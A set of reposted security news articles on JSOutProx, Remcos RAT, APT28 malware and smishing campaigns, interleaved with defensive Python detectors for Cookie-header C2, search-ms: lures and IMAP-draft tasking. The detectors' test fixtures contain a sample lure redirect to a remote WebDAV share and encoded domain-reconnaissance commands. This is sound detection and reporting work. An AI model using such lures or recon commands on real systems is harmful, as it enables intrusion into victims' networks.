New Wave of JSOutProx Malware Targeting Financial Firms in APAC and MENA
https://www.indiavpn.org/2024/04/05/new-wave-of-jsoutprox-malware-targeting-financial-firms-in-apac-and-mena/
Fri, 05 Apr 2024 08:54:38 +0000

Apr 05, 2024 | Newsroom | Cyber Espionage / Cybersecurity


Financial organizations in the Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted by a new version of an “evolving threat” called JSOutProx.

“JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET,” Resecurity said in a technical report published this week.

“It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim’s machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.”

First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider. The operation has a track record of striking banks and other large companies in Asia and Europe.

In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.


Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.

“This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations,” Quick Heal noted [PDF] at the time. “Apart from that, it also has various methods with offensive capabilities that perform various operations.”

The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.
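Because the C2 channel rides inside the Cookie header, the traffic looks like ordinary browsing unless the cookie values themselves are inspected. The following Python is an added example, not code from Resecurity's report or from the malware, and it assumes a hypothetical proxy-log format of `<client> <method> <host> <path> cookie=<header value>`; the log lines and the plaintext inside the two base64 blobs are constructed for the example and are not real JSOutProx indicators. It flags cookie tokens that are bare base64 blobs or that decode to printable text, rather than the `name=value` pairs a browser sends.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of web-proxy log lines (hypothetical format, not real JSOutProx traffic):
# "<client> <method> <host> <path> cookie=<Cookie header value>".  The two base64 blobs are
# built here so the sample is guaranteed to decode; the plaintext inside them is invented.
_CMD_BLOB = base64.b64encode(b"Command:get_sysinfo;Host:WS01;User:jdoe").decode()
_ACK_BLOB = base64.b64encode(b"heartbeat;WS01;jdoe;ping ok").decode()
SAMPLE_LOG = f"""\
10.0.0.5 GET intranet.example.com /index.html cookie=session=abc123; theme=dark
10.0.0.7 GET cdn.example.net /app.js cookie=_ga=GA1.2.1234567890.1700000000
10.0.0.9 GET 203.0.113.10 / cookie={_CMD_BLOB}
10.0.0.9 GET 203.0.113.10 / cookie={_ACK_BLOB}
"""

# A run of base64-alphabet characters, optionally padded; short values are ignored.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


@dataclass
class Finding:
    client: str
    host: str
    token: str
    reason: str
    decoded: Optional[str]


def decoded_text(value: str) -> Optional[str]:
    """Return the base64-decoded payload if it is mostly printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return None
    if not raw:
        return None
    printable = sum(32 <= b < 127 for b in raw)
    if printable / len(raw) < 0.9:
        return None
    return raw.decode("ascii", errors="replace")


def inspect_cookie_header(client: str, host: str, header: str) -> list[Finding]:
    """Flag cookie tokens that look like an encoded message rather than a session cookie."""
    findings = []
    for token in header.split(";"):
        token = token.strip()
        if not token:
            continue
        _, sep, value = token.partition("=")
        if sep and value and not B64_RE.match(token):
            candidate, structured = value, True   # ordinary name=value cookie
        else:
            candidate, structured = token, False  # bare token (or blob whose only '=' is padding)
        if not B64_RE.match(candidate):
            continue
        text = decoded_text(candidate)
        if text is not None:
            findings.append(Finding(client, host, token, "base64-encoded text in Cookie", text))
        elif not structured:
            findings.append(Finding(client, host, token, "bare opaque blob instead of name=value", None))
    return findings


def scan_log(log_text: str) -> list[Finding]:
    """Run the Cookie heuristic over every log line in the constructed format above."""
    findings = []
    for line in log_text.splitlines():
        if " cookie=" not in line:
            continue
        prefix, _, header = line.partition(" cookie=")
        fields = prefix.split()
        if len(fields) < 4:
            continue
        client, host = fields[0], fields[2]
        findings.extend(inspect_cookie_header(client, host, header))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client} -> {f.host}: {f.reason}: {f.decoded or f.token}")
```

Long hexadecimal session identifiers also satisfy the base64 alphabet, so the "bare blob" reason on its own is only a weak signal; the decoded-to-text reason, a bare IP destination, and first-seen hosts are what make a hit worth a look.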

JSOutProx also stands out for the fact that it is a fully functional RAT implemented in JavaScript.

“JavaScript simply does not offer as much flexibility as a PE file does,” Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.

“However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected.”

The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.

The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.

“Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one,” the cybersecurity company said. “This tactic is likely related to the way the actor manages multiple malicious payloads and differentiates targets.”


The exact origins of the e-crime group behind the malware are presently unknown, although the victimology of the attacks and the sophistication of the implant suggest the operators are based in China or affiliated with it, Resecurity posited.

The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.

Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.

Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.

“The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors,” Resecurity said.

Remcos RAT Spreading Through Adult Games in New Attack Wave
https://www.indiavpn.org/2024/01/16/remcos-rat-spreading-through-adult-games-in-new-attack-wave/
Tue, 16 Jan 2024 15:58:54 +0000

Jan 16, 2024 | Newsroom | Botnet / Malware


The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea.

WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country.

While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the AhnLab Security Emergency Response Center’s (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT.


In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named “ffmpeg.exe.”

This results in the retrieval of Remcos RAT from an actor-controlled server.


A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enabling threat actors to exfiltrate sensitive data.

This malware, although originally marketed by the Germany-based firm Breaking Security in 2016 as a bona fide remote administration tool, has since been turned into a potent weapon wielded by adversaries to infiltrate systems and establish unfettered control.


“Remcos RAT has evolved into a malicious tool employed by threat actors across various campaigns,” Cyfirma noted in an analysis in August 2023.

“The malware’s multifunctional capabilities, including keylogging, audio recording, screenshot capture, and more, highlight its potential to compromise user privacy, exfiltrate sensitive data, and manipulate systems. The RAT’s ability to disable User Account Control (UAC) and establish persistence further amplifies its potential impact.”

CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK
https://www.indiavpn.org/2023/12/29/cert-ua-uncovers-new-malware-wave-distributing-oceanmap-masepie-steelhook/
Fri, 29 Dec 2023 12:25:00 +0000

Dec 29, 2023 | Newsroom | Email Security / Malware


The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.

The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.


In reality, the links redirect to malicious web resources that abuse JavaScript and the “search-ms:” URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands, activating an infection chain for a new malware known as MASEPIE.
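The search-ms: handler opens a Windows Explorer search whose scope is set by a `crumb=location:` parameter; when that location is a UNC or WebDAV path, Explorer lists files from the remote share, which is how a lure page can present an attacker-hosted LNK as a local search result. The following Python is an added example, not part of the CERT-UA advisory or of the APT28 tooling, showing how to pull search-ms: URIs out of a fetched page and flag those pointing at a remote location. The HTML and the 203.0.113.77 address are constructed for the example; the `\\host@SSL\DavWWWRoot\...` form is the standard WebDAV-client UNC syntax.

```python
import re
from urllib.parse import unquote

# Constructed lure page (hypothetical; 203.0.113.77 is documentation address space, not a real indicator).
SAMPLE_HTML = """<html><body>
<a href="https://intranet.example.com/docs/report.pdf">Download report</a>
<script>
  // redirect into an Explorer search scoped to an attacker-controlled WebDAV share
  window.location.href = "search-ms:query=report&crumb=location:%5C%5C203.0.113.77%40SSL%5CDavWWWRoot%5Cdocs&displayname=Downloads";
</script>
<a href="search-ms:query=invoice&crumb=location:C:%5CUsers%5CPublic&displayname=Local">local search</a>
</body></html>"""

# A search-ms: URI runs until whitespace, a quote, or an angle bracket ends it.
SEARCH_MS_RE = re.compile(r"search-ms:[^\"'\s<>]+", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into its parameters and pull out the crumb=location: target."""
    _, _, body = uri.partition(":")
    params: dict[str, list[str]] = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.lower(), []).append(unquote(value))
    location = None
    for crumb in params.get("crumb", []):  # a URI may carry several crumb= parameters
        if crumb.lower().startswith("location:"):
            location = crumb[len("location:"):]
            break
    remote = location is not None and location.startswith("\\\\")
    host = None
    if remote:
        # "\\host@SSL\DavWWWRoot\docs" -> "host"; "@SSL" / "@port" are WebDAV-client suffixes
        host = location.lstrip("\\").split("\\", 1)[0].split("@", 1)[0]
    return {
        "uri": uri,
        "query": (params.get("query") or [None])[0],
        "displayname": (params.get("displayname") or [None])[0],
        "location": location,
        "remote": remote,
        "host": host,
    }


def scan_html(html: str) -> list[dict]:
    """Return every search-ms: URI found in page text, scripts included, with parsed fields."""
    return [parse_search_ms(m.group(0)) for m in SEARCH_MS_RE.finditer(html)]


def remote_search_targets(html: str) -> list[dict]:
    """Only the URIs that would make Explorer enumerate a remote (UNC/WebDAV) location."""
    return [f for f in scan_html(html) if f["remote"]]


if __name__ == "__main__":
    for f in remote_search_targets(SAMPLE_HTML):
        print(f"remote search-ms lure -> host {f['host']}, path {f['location']}, label {f['displayname']!r}")
```

The same check applies to email bodies and HTML attachments; a `displayname` that mimics a local folder name on a remote location is the tell, since legitimate intranet uses of search-ms: are rare enough that remote targets can usually be blocked outright at the proxy or by removing the handler registration.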

MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.

The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that’s capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.

Also delivered is a C#-based backdoor dubbed OCEANMAP that’s designed to execute commands using cmd.exe.

“The IMAP protocol is used as a control channel,” CERT-UA said, adding persistence is achieved by creating a URL file named “VMSearch.url” in the Windows Startup folder.

“Commands, in Base64-encoded form, are contained in the ‘Drafts’ of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory.”
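A mailbox-side hunt for this channel follows directly from the description: drafts that were never addressed to anyone, carry a host/user/OS identity, and hold a base64 body that decodes to a shell command are operator tasking; inbox messages with the same identity and an encoded body are the results. The following Python is an added example, not CERT-UA's code or OCEANMAP itself, and it assumes a beacon layout the advisory does not specify: the identity triple in the Subject as `host|user|os` and the command or output base64-encoded in the body. The mailbox snapshot is constructed inline for the example; in practice the same logic runs over messages fetched with an IMAP client.

```python
import base64
import re
from email import message_from_string
from typing import Optional

# Assumed beacon layout (not stated in the CERT-UA text): the message Subject carries
# "<computer>|<user>|<OS version>" and the body is the base64-encoded command or result.
IDENTITY_RE = re.compile(r"^(?P<host>[A-Za-z0-9_-]+)\|(?P<user>[A-Za-z0-9._-]+)\|(?P<os>[^|]+)$")


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


def _raw_message(subject: str, body: str, to: str = "") -> str:
    """Build a minimal RFC 822 message string for the constructed mailbox below."""
    headers = [f"Subject: {subject}"]
    if to:
        headers.append(f"To: {to}")
    return "\n".join(headers) + "\n\n" + body + "\n"


# Constructed mailbox snapshot: two ordinary messages plus a beacon-style exchange.
SAMPLE_MAILBOX = {
    "Drafts": [
        _raw_message("Re: Q4 budget", "Hi Olena, I will send the revised figures tomorrow.", to="olena@example.gov"),
        _raw_message("WS01|jdoe|Windows 10.0.19045", _b64("whoami /all")),
        _raw_message("WS01|jdoe|Windows 10.0.19045", _b64('net group "Domain Admins" /domain')),
    ],
    "INBOX": [
        _raw_message("Weekly status", "Please review the attached report.", to="team@example.gov"),
        _raw_message("WS01|jdoe|Windows 10.0.19045", _b64("example\\jdoe\nUser name  jdoe")),
    ],
}


def decode_base64_text(body: str) -> Optional[str]:
    """Return the decoded body when it is strict base64 wrapping printable text, else None."""
    compact = "".join(body.split())
    if len(compact) < 4 or len(compact) % 4:
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:
        return None
    if not raw or sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / len(raw) < 0.9:
        return None
    return raw.decode("ascii", errors="replace")


def triage_mailbox(folders: dict) -> list[dict]:
    """Flag messages whose Subject is a host|user|OS identity and whose body is encoded text.

    Drafts are treated as operator commands, everything else as implant results,
    matching the direction of the channel described in the CERT-UA advisory."""
    hits = []
    for folder, raw_messages in folders.items():
        for raw in raw_messages:
            msg = message_from_string(raw)
            identity = IDENTITY_RE.match(msg.get("Subject", "") or "")
            if identity is None:
                continue
            decoded = decode_base64_text(msg.get_payload())
            if decoded is None:
                continue
            hits.append({
                "folder": folder,
                "kind": "command" if folder.lower() == "drafts" else "result",
                "identity": identity.group(0),
                "host": identity["host"],
                "user": identity["user"],
                "os": identity["os"],
                "unaddressed": not msg.get("To"),
                "decoded": decoded,
            })
    return hits


def correlate(hits: list[dict]) -> dict:
    """Group commands and results per beaconing identity so each victim host is listed once."""
    summary: dict[str, dict] = {}
    for hit in hits:
        entry = summary.setdefault(hit["identity"], {"commands": [], "results": []})
        entry["commands" if hit["kind"] == "command" else "results"].append(hit["decoded"])
    return summary


if __name__ == "__main__":
    for identity, entry in correlate(triage_mailbox(SAMPLE_MAILBOX)).items():
        print(identity, "commands:", entry["commands"], "results:", entry["results"])
```

The `unaddressed` field matters for triage: a human draft almost always has a recipient, while tasking that is only ever read back over IMAP has no reason to. The identity regex is the assumption most likely to need adjusting against a real sample; the base64-body and empty-To checks hold regardless of how the triple is formatted.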


The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.

The disclosure comes weeks after IBM X-Force revealed APT28’s use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims’ accounts on Exchange servers.

Chinese-Speaking Hackers Pose as UAE Authority in Latest Smishing Wave
https://www.indiavpn.org/2023/12/24/chinese-speaking-hackers-pose-as-uae-authority-in-latest-smishing-wave/
Sun, 24 Dec 2023 11:59:07 +0000

Dec 20, 2023 | Newsroom | Identity Theft / SMS Phishing


The Chinese-speaking threat actors behind Smishing Triad have been observed masquerading as the United Arab Emirates Federal Authority for Identity and Citizenship to send malicious SMS messages with the ultimate goal of gathering sensitive information from residents and foreigners in the country.

“These criminals send malicious links to their victims’ mobile devices through SMS or iMessage and use URL-shortening services like Bit.ly to randomize the links they send,” Resecurity said in a report published this week. “This helps them protect the fake website’s domain and hosting location.”

Smishing Triad was first documented by the cybersecurity company in September 2023, highlighting the group’s use of compromised Apple iCloud accounts to send smishing messages for carrying out identity theft and financial fraud.


The threat actor is also known to offer ready-to-use smishing kits for sale to other cybercriminals for $200 a month, alongside engaging in Magecart-style attacks on e-commerce platforms to inject malicious code and pilfer customer data.

“This fraud-as-a-service (FaaS) model enables ‘Smishing Triad’ to scale their operations by empowering other cybercriminals to leverage their tooling and launch independent attacks,” Resecurity noted.

The latest attack wave sends harmful messages to individuals who have recently updated their residence visas. The smishing campaign applies to both Android and iOS devices, with the operators likely using SMS spoofing or spam services to perpetrate the scheme.

Recipients who click on the embedded link in the message are taken to a bogus, lookalike website (“rpjpapc[.]top”) impersonating the UAE Federal Authority for Identity, Citizenship, Customs and Port Security (ICP), which prompts them to enter personal information such as names, passport numbers, mobile numbers, addresses, and card details.


What makes the campaign noteworthy is the use of a geofencing mechanism to load the phishing form only when visited from UAE-based IP addresses and mobile devices.

“The perpetrators of this act may have access to a private channel where they obtained information about UAE residents and foreigners living in or visiting the country,” Resecurity said.

“This could be achieved through third-party data breaches, business email compromises, databases purchased on the dark web, or other sources.”

Smishing Triad’s latest campaign coincides with the launch of a new underground market known as OLVX Marketplace (“olvx[.]cc”) that operates on the clear web and claims to sell tools to carry out online fraud, such as phish kits, web shells, and compromised credentials.


“While the OLVX marketplace offers thousands of individual products across numerous categories, its site administrators maintain relationships with various cybercriminals who create custom toolkits and can obtain specialized files, thereby furthering OLVX’s ability to maintain and attract customers to the platform,” ZeroFox said.

Cyber Criminals Misuse Predator Bot Detection Tool for Phishing Attacks

The disclosure comes as Trellix revealed how threat actors are leveraging Predator, an open-source tool designed to combat fraud and identify requests originating from automated systems, bots, or web crawlers, as part of various phishing campaigns.

The starting point of the attack is a phishing email sent from a previously compromised account and containing a malicious link, which, when clicked, checks if the incoming request is coming from a bot or a crawler, before redirecting to the phishing page.

The cybersecurity firm said it identified various artifacts where the threat actors repurposed the original tool by providing a list of hard-coded links as opposed to generating random links dynamically upon detecting a visitor is a bot.

“Cyber criminals are always looking for new ways to evade detection from organizations’ security products,” security researchers Vihar Shah and Rohan Shah said. “Open-source tools such as these make their task easier, as they can readily use these tools to avoid detection and more easily achieve their malicious goals.”
